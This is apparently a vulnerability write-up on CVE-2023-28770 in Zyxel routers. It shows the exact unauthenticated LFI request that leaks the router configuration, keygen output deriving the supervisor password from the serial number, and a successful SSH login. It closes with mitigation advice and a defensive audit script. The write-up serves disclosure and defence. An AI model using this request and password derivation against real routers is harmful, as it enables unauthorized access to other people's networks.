CVE-2023-28770
Description
The sensitive information exposure vulnerability in the CGI “Export_Log” and the binary “zcmd” in Zyxel DX5401-B0 firmware versions prior to V5.17(ABYO.1)C0 could allow a remote unauthenticated attacker to read the system files and to retrieve the password of the supervisor from the encrypted file.
Ratings
- Attacker Value: Very High
- Exploitability: Very High
Technical Analysis
In December 2022, SEC Consult released a blog post titled "The enemy from within: Unauthenticated Buffer Overflows in Zyxel routers still haunting users". The blog explains an unauthenticated buffer overflow in more than 40 different Zyxel router models and the vast number (thousands) of vulnerable routers that are accessible via the Internet.
The impact is still quite limited because the published Metasploit exploit module only works from the LAN side.
However, the unauthenticated buffer overflow is not the only vulnerability on these routers: SEC Consult discovered another 7 vulnerabilities that are described in their security analysis "Multiple Critical Vulnerabilities in multiple Zyxel devices".
While reading the security analysis and reviewing the other vulnerabilities, I discovered a new opportunity to build an exploit by chaining two other vulnerabilities that allows an unauthenticated attacker to get privileged access to the Zyxel router from either the WAN or LAN side. The potential of this exploit to attack from the WAN side makes it quite dangerous, taking into account the large number of unpatched Zyxel routers out there on the Internet.
Recently, CVE-2023-28770 has been released, covering the LFI vulnerability that is used in this chained exploit.
Zyxel router chained RCE
Exploiting an unauthenticated local file disclosure (LFI) vulnerability and a weak password derivation algorithm
The first vulnerability that stood out to me is the LFI vulnerability discussed in section 2 of the security analysis by SEC Consult.
The LFI vulnerability is present in the zhttp binary and allows an unauthenticated attacker to read the entire configuration of the router via the vulnerable endpoint /Export_Log?/data/zcfg_config.json.
The Burp request below shows a redacted response of the information that is disclosed, such as encrypted passwords, account information, service configuration (FTP, Telnet, SSH), and hardware details such as serial number and hardware model. In total it is around 4000 lines of nested JSON information that you would not like to share with anyone out there.
LFI Burp request and response
GET /Export_Log?/data/zcfg_config.json HTTP/1.1
Host: zyxel-vuln-router:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Connection: close
Response (REDACTED)
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 148678
Date: Fri, 14 Apr 2023 08:47:46 GMT
X-Frame-Options: sameorigin
Content-Security-Policy: frame-ancestors 'self'

---- Hardware Information ----
{
  "Manufacturer":"ZYXEL",
  "ManufacturerOUI":"XXXXX",
  "ModelName":"VMG3625-T20A",
  "Description":"Wireless AC VDSL2 4-port Gateway with USB",
  "ProductClass":"VMG3625-T20A",
  "SerialNumber":"S000Y00000000",
  "SoftwareVersion":"V5.30(ABOU.2)b1_I0_20180821",
  "AdditionalHardwareVersion":"",
  "AdditionalSoftwareVersion":"",
  "UpTime":607055,
  "FirstUseDate":"2023-03-21T09:07:41",
  "VendorConfigFileNumberOfEntries":0,
  "SupportedDataModelNumberOfEntries":0,
  "ProcessorNumberOfEntries":0,
  "VendorLogFileNumberOfEntries":0,
  "LocationNumberOfEntries":0,
  "FixManufacturerOUI":""
},

---- Account Information ----
"X_ZYXEL_LoginCfg":{
  "LoginGroupConfigurable":true,
  "LogGp":[
    {
      "GP_Privilege":"_encrypt_XXXXXXXXXXXXXX",
      "Account":[
        {
          "AutoShowQuickStart":false,
          "Enabled":true,
          "EnableQuickStart":true,
          "Page":"",
          "Username":"root",
          "Password":"",
          "PasswordHash":"",
          "Privilege":"_encrypt_XXXXXXXXXXXXX",
          "GetConfigByFtp":true,
          "DefaultPassword":"_encrypt_XXXXXXXXXXXXXX",
          "DefaultGuiPassword":"",
          "ResetDefaultPassword":false,
          "shadow":"root:$6$XXXXXXXXXXX:0::::::\n",
          "smbpasswd":"root:0:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:33A9D53C23525B5F63A0C536445E2B76:[U ]:LCT-0000004E:\n",
          "ConfigAccountFromWAN":false,
          "DefPwLength":8,
          "AccountCreateTime":0,
          "AccountRetryTime":3,
          "AccountIdleTime":300,
          "AccountLockTime":300,
          "RemoHostAddress":"",
          "DotChangeDefPwd":false,
          "ShowSkipBtnInChgDefPwdPage":false,
          "AutoGenPwdBySn":false,
          "RemoteAccessPrivilege":"LAN",
          "OldDefaultPassword":"",
          "CardOrder":"",
          "ThemeColor":"",
          "HiddenPage":""
        },
        {
          "AutoShowQuickStart":false,
          "Enabled":true,
          "EnableQuickStart":true,
          "Page":"",
          "Username":"supervisor",
          "Password":"",
          "PasswordHash":"",
          "Privilege":"_encrypt_XXXXXXXXXXX",
          "DefaultPassword":"_encrypt_XXXXXXXXXXX",
          "DefaultGuiPassword":"",
          "ResetDefaultPassword":false,
          "shadow":"supervisor:$6$XXXXXXXXXX:0::::::\n",
          "smbpasswd":"supervisor:12:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:33A9D53C23525B5F63A0C536445E2B76:[U ]:LCT-0000004E:\n",
          "ConfigAccountFromWAN":false,
          "DefPwLength":8,
          "AccountCreateTime":0,
          "AccountRetryTime":3,
          "AccountIdleTime":300,
          "AccountLockTime":300,
          "RemoHostAddress":"",
          "DotChangeDefPwd":false,
          "ShowSkipBtnInChgDefPwdPage":false,
          "AutoGenPwdBySn":false,
          "RemoteAccessPrivilege":"LAN",
          "OldDefaultPassword":"",
          "CardOrder":"",
          "ThemeColor":"",
          "HiddenPage":""
        }
      ],
      "Level":"high"
    },

---- Service Information ----
"X_ZYXEL_RemoteManagement":{
  "Service":[
    {
      "Name":"HTTP",
      "Enable":true,
      "Protocol":6,
      "Port":8080,
      "Mode":"LAN_WAN",
      "TrustAll":true,
      "OldMode":"LAN_ONLY",
      "RestartDeamon":1,
      "LifeTime":20,
      "BoundInterfaceList":""
    },
    {
      "Name":"HTTPS",
      "Enable":true,
      "Protocol":6,
      "Port":443,
      "Mode":"LAN_WAN",
      "TrustAll":true,
      "OldMode":"LAN_ONLY",
      "RestartDeamon":true,
      "LifeTime":20,
      "BoundInterfaceList":""
    },
    {
      "Name":"FTP",
      "Enable":true,
      "Protocol":6,
      "Port":21,
      "Mode":"LAN_WAN",
      "TrustAll":true,
      "OldMode":"LAN_ONLY",
      "RestartDeamon":true,
      "LifeTime":20,
      "BoundInterfaceList":""
    },
    {
      "Name":"TELNET",
      "Enable":true,
      "Protocol":6,
      "Port":23,
      "Mode":"LAN_WAN",
      "TrustAll":true,
      "OldMode":"LAN_ONLY",
      "RestartDeamon":true,
      "LifeTime":20,
      "BoundInterfaceList":""
    },
    {
      "Name":"SSH",
      "Enable":true,
      "Protocol":6,
      "Port":22,
      "Mode":"LAN_WAN",
      "TrustAll":true,
      "OldMode":"LAN_ONLY",
      "RestartDeamon":true,
      "LifeTime":20,
      "BoundInterfaceList":""
    },
This information disclosure in itself does not pose a direct threat to these routers. Attackers could of course try to crack the obtained shadow password hashes, but that will take a long time.
So is there any other way to use the disclosed information for a successful attack?
And of course the answer is YES!
The second vulnerability that comes into play is the one described in section 3 of the analysis, "Unsafe Storage of Sensitive Data". It explains the password derivation technique used to decrypt the _encrypt_XXXXXX passwords in the JSON configuration file using a static AES key and IV.
But my attention was drawn more to another analysis, "Getting root on a Zyxel VMG8825-T50 router", done by Thomas Rinsma in 2020, which was referenced at the bottom of the section and in which Thomas explains the password derivation techniques used on Zyxel routers. In particular, the section "Tangent 2: key and password derivation mechanisms" is quite interesting: it describes in detail how the supervisor user password can be derived from the serial number of the router.
So what if we use the LFI vulnerability to get the serial number of the router and derive the supervisor password using this password derivation technique? We can then use the disclosed router services information to check whether ssh or telnet is enabled and accessible from the WAN, and try to log in as supervisor to gain access to the router.
Bogi Napoleon Wennerstrøm has reverse engineered and implemented some of these derivation functions, producing the supervisor password. His repository can be found on GitHub (see the references below).
I tested his password derivation functions and can confirm that either zcfgBeCommonGenKeyBySerialNumMethod2 or zcfgBeCommonGenKeyBySerialNumMethod3 works on vulnerable Zyxel routers.
# python ./main.py S000Y00000000
zcfgBeCommonGenKeyBySerialNum : A43338B488
zcfgBeCommonGenKeyBySerialNum_CBT : UdcTaX78
zcfgBeCommonGenKeyBySerialNumMethod2 : 2dc1a078 <==
zcfgBeCommonGenKeyBySerialNumMethod3 : 58Pxnwdefr <==
zcfgBeCommonGenKeyBySerialNumConfigLength(1) : EXXAY7XF
zcfgBeCommonGenKeyBySerialNumConfigLength(2) : 4UxwvUxf
zcfgBeCommonGenKeyBySerialNumConfigLength(3) : 4UxavUxf
zcfgBeCommonGenKeyBySerialNumConfigLengthOld(1) : EXXAY7XF
zcfgBeCommonGenKeyBySerialNumConfigLengthOld(2) : 4UxwvUxf
zcfgBeCommonGenKeyBySerialNumConfigLengthOld(3) : 4UxavUxf

┌──(root💀cuckoo)-[~/zyxel_exploit/zyxel-vmg8825-keygen]
└─# ssh supervisor@zyxel-vuln-router
supervisor@zyxel-vuln-router's password:
$ uname -a
Linux VMG3625-T20A 2.6.36 #7 SMP Sat Aug 18 12:18:02 CET 2018 mips GNU/Linux
$ id
uid=12(supervisor) gid=12 groups=12
$
I have created a Metasploit module that chains these two vulnerabilities together to gain access to vulnerable Zyxel routers. The PR submission to mainstream Metasploit is completed and the module is available.
Mitigation
Please follow the Zyxel Security Advisory to patch your router.
As a temporary measure, you should disable all services on the router, such as telnet, ftp and ssh, that allow access to the supervisor user, and configure your web interface to be accessible only by the admin user.
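The services check described in the analysis above (is ssh or telnet enabled towards the WAN?) and the mitigation are the same question asked from the defender's side. As an added example that is not part of the original assessment or of the Metasploit module, the script below audits a constructed zcfg_config.json fragment modelled on the disclosed fields: it reports whether the serial number and the supervisor account are present and which remote-management services are enabled with a Mode that includes the WAN. Placing SerialNumber, X_ZYXEL_LoginCfg and X_ZYXEL_RemoteManagement under one flat object is an assumption; the real file nests them more deeply.

```python
import json

# Constructed sample modelled on the fields seen in the leaked zcfg_config.json
# excerpt above; the values are placeholders, not data from a real device, and
# the flat nesting of the three keys under one object is an assumption.
SAMPLE_CONFIG = json.dumps({
    "SerialNumber": "S000Y00000000",
    "X_ZYXEL_LoginCfg": {"LogGp": [{"Account": [
        {"Username": "root", "RemoteAccessPrivilege": "LAN"},
        {"Username": "supervisor", "RemoteAccessPrivilege": "LAN"},
    ]}]},
    "X_ZYXEL_RemoteManagement": {"Service": [
        {"Name": "HTTP", "Enable": True, "Port": 8080, "Mode": "LAN_WAN"},
        {"Name": "SSH", "Enable": True, "Port": 22, "Mode": "LAN_WAN"},
        {"Name": "TELNET", "Enable": True, "Port": 23, "Mode": "LAN_ONLY"},
        {"Name": "FTP", "Enable": False, "Port": 21, "Mode": "LAN_WAN"},
    ]},
})

# Services that hand a shell or the file system to whoever knows the supervisor
# password; the mitigation above says to disable them until the router is patched.
SHELL_SERVICES = {"SSH", "TELNET", "FTP"}


def wan_exposed_services(config_text):
    """Names of enabled remote-management services whose Mode includes the WAN."""
    cfg = json.loads(config_text)
    services = cfg.get("X_ZYXEL_RemoteManagement", {}).get("Service", [])
    return sorted(s["Name"] for s in services
                  if s.get("Enable") and "WAN" in str(s.get("Mode", "")))


def audit(config_text):
    """Summarise what the leaked file gives away and what must be switched off."""
    cfg = json.loads(config_text)
    exposed = wan_exposed_services(config_text)
    accounts = [a["Username"]
                for gp in cfg.get("X_ZYXEL_LoginCfg", {}).get("LogGp", [])
                for a in gp.get("Account", [])]
    return {
        "serial_disclosed": bool(cfg.get("SerialNumber")),  # input to the keygen
        "supervisor_present": "supervisor" in accounts,
        "wan_exposed": exposed,
        "must_disable": sorted(set(exposed) & SHELL_SERVICES),
    }


if __name__ == "__main__":
    for key, value in audit(SAMPLE_CONFIG).items():
        print(f"{key}: {value}")
```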
References
CVE-2023-28770
The enemy from within: Unauthenticated Buffer Overflows in Zyxel routers still haunting users
Multiple Critical Vulnerabilities in multiple Zyxel devices.
Getting root on a Zyxel VMG8825-T50 router
Zyxel VMG8825-T50 Supervisor Keygen – Github
Zyxel Security Advisory
Metasploit PR: Zyxel router chained RCE using LFI and weak password derivation algorithm
Credits
Credits go to:
SEC Consult team
Thomas Rinsma
Bogi Napoleon Wennerstrøm
General Information
Vendors
- zyxel
Products
- dx5401-b0 firmware